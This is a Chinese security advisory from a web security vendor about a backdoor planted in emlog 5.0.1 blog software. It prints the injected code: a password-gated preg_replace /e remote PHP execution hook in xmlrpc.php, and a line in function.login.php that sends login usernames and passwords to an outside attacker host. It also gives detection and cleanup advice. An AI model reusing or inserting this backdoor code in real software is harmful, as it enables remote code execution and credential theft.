RSS Feed
更好更安全的互联网

emlog 5.0.1 xmlrpc.php 后门事件预警

2013-05-06

2013年5月3日,SCANV网站安全中心研究人员发现emlog个人博客系统(www.emlog.net)最新版 5.0.1 被人为植入后门代码,攻击者可以利用后门远程执行恶意命令、盗取管理员帐号密码。作为漏洞应急响应,我们在第一时间通知emlog官方,经过交流,官方确认了后门事件,并在官方论坛发布公告以及对我们的感谢(http://bbs.emlog.net/thread-29021-1-1.html)。同时,我们也随即发布了一款在线小工具,可以快速诊断网站是否存在这个后门(http://www.scanv.com/tools/)。

后门文件分析

经过我们分析,入侵者在emlog源码内植入了两处恶意代码,一处可以远程执行恶意命令,一处可以记录管理员帐号密码,分别存在于/src/xmlrpc.php文件和/src/include/lib/function.login.php文件中,分析如下。
[1] /src/xmlrpc.php
任意用户可直接访问该文件,通过该文件中的恶意代码可以执行恶意PHP代码、命令。被植入代码:

58  if (isset($_GET["rsdsrv"])) {
59    if($_GET["rsdsrv"] == "20c6868249a44b0ab92146eac6211aeefcf68eec"){
60      @preg_replace("//e",$_POST['IN_EMLOG'],"Unauthorization");
61     }
62  }

代码60行通过preg_replace的e参数执行$_POST['IN_EMLOG']变量传递过来的恶意PHP代码,在执行代码60行之前,攻击者需要通过$_GET['rsdsrv']变量传递一个值为“20c6868249a44b0ab92146eac6211aeefcf68eec”的字符串,这可能是攻击者利用此后门时需要的认证口令。

[2] /src/include/lib/function.login.php
任意登录emlog的用户,其用户名和密码都会被发送到入侵者定义的服务器。被植入代码:

54  file_get_contents("http://b1.a.0day.la/?url=".base64_encode($_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'])."&username=".base64_encode($username)."&password=".base64_encode($password));

此代码位于function.login.php文件的checkUser()函数的第54行代码中,checkUser()这个函数在emlog中用来校验用户的密码,入侵者在这里把用户提交的$username变量以及$password变量截获,通过file_get_contents()函数把用户名和密码发送到一个名为b1.a.0day.la的服务器,当然为了记录受害者的地址,入侵者的代码还通过$_SERVER['HTTP_HOST']变量和$_SERVER['PHP_SELF']变量记录了受害者服务器的地址。

 

SCANV网站安全中心后门检测工具
地址:http://www.scanv.com/tools/

SCANV网站安全中心给出解决方案

1.根据上文给出的恶意代码行号,手动清除恶意代码;
2.目前官方版本已经清除恶意代码,可以更新至官方最新版。

关于SCANV网站安全中心及知道创宇

“SCANV 网站安全中心“(http://www.scanv.com),由知道创宇安全研究团队驱动,  专注网站安全一体化解决方案,给站长朋友们提供网站漏洞诊断、漏洞预警、被黑预警,并 提供多维度的安全解决方案、专家一对一漏洞修复、一键云端防御等。

"知道创宇" (http://www.knownsec.com)全称为北京知道创宇信息技术有限公司。是 国内最早提出网站安全云监测及云防御的高新企业,始终致力于为客户提供基于云技术支撑 的下一代 Web 安全解决方案。 知道创宇总部设在北京,在香港、上海、广州、成都设有分公司,客户及合作伙伴来自中国、 美国、日本、韩国等。凭借强大的云安全技术与产品的高可用性、易管理性、合规性和业务 连续性、以及动态保障关键 Web 数据资产安全的能力,帮助用户应对变化多端的互联网安 全威胁,赢得了企业、政府与公共机构的青睐。知道创宇安全实验室在零日安全威胁与云安 全技术方面的研究得到了业内的广泛认同并享有极高知名度。

作者:niubl | Categories:漏洞通告 | Tags:

发表评论